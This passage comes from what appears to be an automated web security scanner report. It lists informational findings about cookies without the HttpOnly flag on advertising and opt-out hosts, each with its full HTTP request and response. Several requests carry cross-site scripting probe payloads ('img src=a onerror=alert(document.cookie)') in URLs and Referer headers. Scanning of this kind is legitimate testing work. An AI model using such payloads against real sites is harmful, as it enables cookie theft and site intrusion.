Content-Type: text/html


16.126. http://notrack.specificclick.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificclick.net
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&cdn4=1 HTTP/1.1
Host: notrack.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=m0NgwKlU3fGJkA

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:25:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ug=1; expires=Sun, 04-Sep-2011 10:25:23 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=1; expires=Sun, 04-Sep-2011 10:25:23 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 02-Sep-2016 11:25:23 GMT; path=/; domain=.specificclick.net
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificclick.net/CookieCheck.php?refreshCheck=1&optThis=1&result=
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


16.127. http://notrack.specificmedia.com/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&result=optout_success HTTP/1.1
Host: notrack.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 02-Sep-2016 10:59:28 GMT; path=/; domain=.specificmedia.com
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificmedia.com/CookieCheck.php?refreshCheck=1&optThis=1&result=optout_success
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


16.128. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle?RM_Exclude=& HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660; OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:30:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03PUO3022VvT|O1022bkP|O1022jF2; expires=Wed, 04-Sep-13 03:30:23 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2090
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N553.martinimedianet/B5114832.11;sz=300x250;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/martinimediainc.com/passback/L2
...[SNIP]...

16.129. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia6a976%22%3E%3Cimg+src%3Da+onerror%3Dalert%28document.cookie%29%3E1e77da311f0%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F/pubclick/&XE&muid=21001313421770843092046&&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:53:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFH=011R03lU; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2000
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('<iframe id=');
document.write ("'");
document.write ('aa3600d0');
document.write ("'");
document.write (' name=');
document.write ("'");
document.write ('aa3600
...[SNIP]...

16.130. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F/pubclick/&XE&muid=21051315103139790868608&&tax23_RefDocLoc=http://www.google.com/search&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:51 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R02ZNO2022VvT|O1022jF2; expires=Wed, 04-Sep-13 02:39:51 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1923
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<iframe id=');
document.write ("'");
document.write ('4364c62f');
document.write ("'");
document.write (' name=');
document.write ("'");
document.write ('4364c6
...[SNIP]...

16.131. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96?XE&oas_pv=no_analytics&XE HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660; OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R02P3P3022VvT|P1022jF2; expires=Wed, 04-Sep-13 03:27:15 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: application/x-javascript

document.write ('<!-- Martini/Segment_Matching_001/Segment_Matching_001 -->\n');
document.write ('<iframe src="https://network.realmedia.com/2/TRACK_Managed/MartiniMedia/Seg001_Secure@Bottom3" style="
...[SNIP]...

16.132. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia6a976%22%3E%3Cimg+src%3Da+onerror%3Dalert%28document.location%29%3E1e77da311f0%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F/pubclick/&XE&muid=21001313421770843092046&&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2; martinicrt=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:03:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03t7O3022VvT|O3022bxY|O6022bxa|O4022fgv|O1022jF2; expires=Wed, 04-Sep-13 04:03:10 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3684
Content-Type: application/x-javascript

document.write ('<script type="text/javascript">\n');
document.write ('\n');
document.write ('function pr_swfver(){\n');
document.write ('\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\
...[SNIP]...

16.133. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96?XE&oas_pv=no_analytics&XE HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022VvT|O1022jF2; martinicrt=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:03:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03vcO3022bxY|O6022bxa|O1022jF2; expires=Wed, 04-Sep-13 04:03:43 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: application/x-javascript

document.write ('<!-- Martini/Segment_Matching_001/Segment_Matching_001 -->\n');
document.write ('<iframe src="https://network.realmedia.com/2/TRACK_Managed/MartiniMedia/Seg001_Secure@Bottom3" style="
...[SNIP]...

16.134. http://oo.afy11.net/NAIOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIOptOut.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NAIOptOut.aspx?nocache=0.4050807 HTTP/1.1
Host: oo.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=eoMPggRrV06L1ODhUblQrQ; s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /NAIConfirm.aspx
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
Set-Cookie: a=AAAAAAAAAAAAAAAAAAAAAA; domain=afy11.net; expires=Sat, 04-Sep-2021 00:00:00 GMT; path=/
Set-Cookie: f=; domain=afy11.net; expires=Sat, 04-Sep-2010 00:00:00 GMT; path=/
Set-Cookie: c=; domain=afy11.net; expires=Sat, 04-Sep-2010 00:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:12:54 GMT
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/NAIConfirm.aspx">here</a>.</h2>
</body></html>

16.135. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4642/5271/7551-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4642/5271/7551-15.js?cb=0.3750513994600624 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; nus_2046=0.00; ses2=5032^2&9346^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:38:16 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4642/5271; expires=Sun, 04-Sep-2011 03:38:16 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 03:38:16 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^2&9346^1&5271^2; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=105703; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3162001.js^1^1315103896^1315103896&3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 02:38:16 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2230

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162001"
...[SNIP]...

16.136. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/?action=opt-out HTTP/1.1
Host: optout.33across.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 10:59:28 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.33across.com
Set-Cookie: 33x_nc=33Across+Optout; expires=Wed, 01-Sep-2021 10:59:28 GMT; path=/; domain=.33across.com
Location: http://optout.33across.com/api/?action=verify
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8


16.137. http://optout.adlegend.com/nai/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /nai/optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout.php?action=setcookie HTTP/1.1
Host: optout.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=52-247451615

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:29:02 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sun, 24 Oct 2010 01:00:00 GMT
Set-Cookie: ID=OPT_OUT; expires=Fri, 02-Sep-2016 11:29:02 GMT; path=/; domain=.adlegend.com
Set-Cookie: PrefID=deleted; expires=Sat, 04-Sep-2010 11:29:01 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=deleted; expires=Sat, 04-Sep-2010 11:29:01 GMT; path=/; domain=.adlegend.com
Location: /nai/optout.php?action=readcookie
Content-Length: 0
Content-Type: text/html


16.138. http://optout.crwdcntrl.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:18:06 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:13 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


16.139. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/dclk/optoutnai.pl HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Redirect
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 208
Content-Type: text/html
Location: http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out
Server: Microsoft-IIS/6.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR FIN INT DEM STA POL HEA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: id=OPT_OUT; domain=.doubleclick.net; path=/; expires=Wednesday, 09-Nov-2030 23:59:00 GMT
Date: Sun, 04 Sep 2011 10:59:26 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&amp;state=opt_out">here</a
...[SNIP]...

16.140. http://optout.imiclk.com/cgi/optout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.imiclk.com
Path:   /cgi/optout.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/optout.cgi?nai=1&nocache=0.6761591 HTTP/1.1
Host: optout.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://optout.imiclk.com/cgi/nai_status.cgi?oo=1&rand=1315134760
Date: Sun, 04 Sep 2011 11:12:40 GMT
Connection: close
Set-Cookie: OL8U=0; expires=Wed, 01-Sep-2021 11:12:40 GMT; path=/; domain=imiclk.com
Set-Cookie: IMI=OPT_OUT; expires=Wed, 01-Sep-2021 11:12:40 GMT; path=/; domain=imiclk.com
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


16.141. http://optout.mookie1.decdna.net/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

